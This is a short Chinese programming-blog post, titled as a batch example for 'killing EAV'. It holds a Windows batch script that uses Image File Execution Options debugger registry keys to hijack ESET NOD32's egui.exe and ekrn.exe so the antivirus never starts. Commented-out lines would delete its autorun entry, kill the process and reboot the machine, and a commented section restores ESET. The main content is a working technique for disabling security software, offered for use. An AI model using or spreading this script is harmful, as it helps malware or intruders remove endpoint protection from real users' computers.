- @echo off
- reg add "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File
- Execution Options/egui.exe" /v debugger /t reg_sz /d svchost.exe /f >nul
- 2>nul
- reg add "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File
- Execution Options/ekrn.exe" /v debugger /t reg_sz /d svchost.exe /f >nul
- 2>nul
- ::reg delete HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /v egui /f
- >nul 2>nul
- ::taskkill /f /im egui.exe >nul
- ::重启计算机,eav宣布投降
- ::shutdown -r -t 0
- pause
- :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
- :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
- :::::::::::::::::
- ::下面是恢复EAV的注册表文件内容(!安装路径可能不一样):
- ::Windows Registry Editor Version 5.00
- ::[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
- ::"egui"="/"E://Program Files//ESET//ESET NOD32 Antivirus//egui.exe/" /hide
- /waitservice"
- ::解除对EAV的劫持
- ::reg delete "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File
- Execution Options/egui.exe" /f >nul 2>nul
- ::reg delete "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File
- Execution Options/ekrn.exe" /f >nul 2>nul
- ::重新启动eset服务
- ::net start ekrn
[编程实例]批处理干掉EAV
最新推荐文章于 2024-11-08 12:18:48 发布
